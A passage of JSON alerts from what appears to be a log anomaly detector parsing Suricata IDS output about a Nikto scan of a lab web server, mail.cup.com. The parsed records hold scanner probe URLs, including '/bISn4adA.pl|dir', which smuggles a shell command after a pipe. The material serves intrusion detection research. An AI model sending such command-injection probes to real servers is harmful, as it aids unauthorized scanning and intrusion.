"/parser/model/flow_id/flow_id": "\"flow_id\":785974704093502,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 785974704093502, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.212088+0000\",\"flow_id\":785974704093502,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.213694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46826 -> 192.168.10.154:80", "/parser/model/time": 1583349514.213694, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46826, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.213694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46826 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pl|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.213956+0000\",\"flow_id\":750897706188682,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.213956, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":750897706188682,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pl|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pl|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pl|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pl|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46826, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":750897706188682,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 750897706188682, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.213956+0000\",\"flow_id\":750897706188682,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.215650 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46828 -> 192.168.10.154:80", "/parser/model/time": 1583349514.21565, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46828, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.215650 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46828 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.xbb", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.215801+0000\",\"flow_id\":724402052941536,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.215801, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":724402052941536,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.xbb\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.xbb\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.xbb", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.xbb", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46828, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":724402052941536,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 724402052941536, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.215801+0000\",\"flow_id\":724402052941536,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.217240 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46830 -> 192.168.10.154:80", "/parser/model/time": 1583349514.21724, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46830, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.217240 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46830 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.LOG", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.217384+0000\",\"flow_id\":2009838519995892,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.217384, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2009838519995892,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.LOG\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.LOG\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.LOG", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.LOG", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": 